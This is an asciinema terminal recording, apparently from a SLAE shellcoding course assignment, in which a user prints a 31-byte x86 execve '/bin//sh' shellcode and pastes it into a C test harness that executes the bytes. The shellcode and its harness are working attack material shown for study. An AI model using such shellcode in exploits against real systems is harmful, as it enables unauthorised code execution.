{"version": 2, "width": 113, "height": 33, "timestamp": 1534928581, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.026201, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004h\u001b[c\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;33r\u001b]112\u0007\u001b[2;4H\u001b[?2004h"]
[0.062192, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                                                 \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.062663, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;33r\u001b[2;4H\u001b[?2004h"]
[0.064804, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                                                 \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.155478, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                                                 \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.268208, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                                                 \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25h"]
[0.269326, "o", "\u001b[?25l\u001b[33;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;4H\u001b[?12l\u001b[?25"]
[0.269811, "o", "h"]
[1.050387, "o", "."]
[1.456465, "o", "\b./"]
[2.280588, "o", "e"]
[2.408116, "o", "x"]
[2.544031, "o", "e"]
[3.004208, "o", "c_"]
[3.712741, "o", "m"]
[3.908156, "o", "e.py\u001b[1m \u001b(B\u001b[m"]
[4.696032, "o", "\b -"]
[5.177447, "o", "m"]
[5.519704, "o", "\r\n\u001b[?2004l"]
[5.577051, "o", "Shellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68"]
[5.577352, "o", "\r\n"]
[5.577771, "o", "Length:  31"]
[5.577929, "o", "\r\n"]
[5.579883, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[6;1H \r"]
[5.581825, "o", "\u001b[1;32r\u001b[7;32r\u001b[26S\u001b[6;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[6;60H\u001b(B\u001b[m"]
[5.582156, "o", "\r\n"]
[5.582325, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[5.582495, "o", "\u001b[K"]
[5.582933, "o", "\u001b[?2004h"]
[10.074753, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K"]
[10.074993, "o", "\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;4H\u001b[?12l\u001b[?25h"]
[10.119079, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K"]
[10.119341, "o", "\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;4H\u001b[?12l\u001b[?25h"]
[11.366185, "o", "v"]
[11.43746, "o", "\bvi"]
[11.65952, "o", "m"]
[11.707645, "o", " "]
[11.820393, "o", "s"]
[11.933154, "o", "h"]
[12.107479, "o", "ellcode"]
[12.4595, "o", "."]
[12.652091, "o", "c"]
[12.85382, "o", "\r\n\u001b[?2004l"]
[12.935728, "o", "\u001b]0;SLAE ❐ SLAE ● 1 vim\u0007\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b"]
[12.942713, "o", "[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[8;1H\u001b[?12l\u001b[?25h"]
[12.943095, "o", "\u001b[1;32r\u001b[2;32r\u001b[31S\u001b[1;1H\u001b[K\u001b[1;33r\u001b[1;1H"]
[12.956784, "o", "\u001b[32d\"shellcode.c\"\u001b[?25l"]
[12.959206, "o", " 17L, 233C"]
[12.983863, "o", "\u001b[H\u001b[34m/*\r\n * Put your assembler file here\r\n */\u001b[5;1H\u001b[35m#include\u001b[31m<stdio.h>\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[8;1H\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[10;1H\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\r\n{\u001b[12;9Hprintf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[13;9H\u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[14;9Hret();\r\n}\u001b[18;1H\u001b[94m~                                                                                       "]
[12.984148, "o", "                         \u001b[19;1H~                                                                                                                \u001b[20;1H~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                                                \u001b[27;1H"]
[12.9843, "o", "~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;96H\u001b[39m9,0-1\u001b[9CAll\u001b[9;1H\u001b[?12l\u001b[?25h"]
[13.059017, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n"]
[13.05931, "o", "\u001b[94m~                                                                                                                \u001b[19;1H~                                                                                                                \u001b[20;1H~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                          "]
[13.059472, "o", "                                                                                      \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 17L, 233C                                                                        9,0-1         All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m"]
[13.05954, "o", "◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;1H\u001b[?12l\u001b[?25h"]
[13.178614, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n"]
[13.182107, "o", "\u001b[94m~                                                                                                                \u001b[19;1H~                                                                                                                \u001b[20;1H~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                          "]
[13.182385, "o", "                                                                                      \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 17L, 233C                                                                        9,0-1         All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m"]
[13.182459, "o", "◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;1H\u001b[?12l\u001b[?25h"]
[14.306625, "o", "\u001b[32;86HO\u001b[9;1H\u001b[?25l"]
[14.307853, "o", "\u001b[32;86H \r\u001b[1m-- INSERT --\u001b(B\u001b[m\u001b[K\u001b[83C9,10-24\u001b[7CTop\u001b[9;31r\u001b[9;1H\u001b[1L\u001b[32;96H\u001b[K9,10-24\u001b[7CAll\u001b[1;33r\u001b[9;24H\u001b[?12l\u001b[?25h"]
[14.531777, "o", "\u001b[31m\"\u001b[32;99H\u001b[39m1-25\u001b[9;25H"]
[15.343557, "o", "\u001b[10;31r\u001b[10;1H\u001b[1L\u001b[9;25H\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\rf\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[1;33r\u001b[10;38H\u001b[?25l\u001b(B\u001b[m"]
[15.344206, "o", "\u001b[32;96H\u001b[K9,137-151     All\u001b[10;38H\u001b[?12l\u001b[?25h"]
[15.884365, "o", "\u001b[31m\"\u001b[32;100H\u001b[39m8-152\u001b[10;39H"]
[16.035887, "o", ";\u001b[32;100H9-153\u001b[10;40H"]
[16.41559, "o", "\u001b[32;1H\u001b[K\u001b[85C^[\u001b[10;39H\u001b[?25l"]
[16.516958, "o", "\u001b[32;86H  \u001b[8C9,138-152     All\u001b[10;39H\u001b[?12l\u001b[?25h"]
[16.602237, "o", "\u001b[32;86H:\b\u001b[K\r:"]
[16.778014, "o", "w"]
[16.890596, "o", "q"]
[17.002387, "o", "\r"]
[17.004284, "o", "\"shellcode.c\"\u001b[?25l"]
[17.011291, "o", " 18L, 372C written"]
[17.015709, "o", "\r"]
[17.01598, "o", "\u001b[1;32r\u001b[32;113H\n\u001b[1;33r\u001b[32;1H"]
[17.016221, "o", "\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[17.023544, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[8;1H \r"]
[17.025037, "o", "\u001b[1;32r\u001b[9;32r\u001b[24S\u001b[8;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[8;60H\u001b(B\u001b[m"]
[17.025291, "o", "\r\n"]
[17.025455, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[17.02591, "o", "\u001b[K"]
[17.02622, "o", "\u001b[?2004h"]
[17.363152, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[33;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m "]
[17.36361, "o", "SLAE \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[17.363803, "o", "."]
[17.440977, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[17.44126, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m.\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;5H\u001b[?12l\u001b[?25h"]
[17.52243, "o", "\b.."]
[17.572931, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
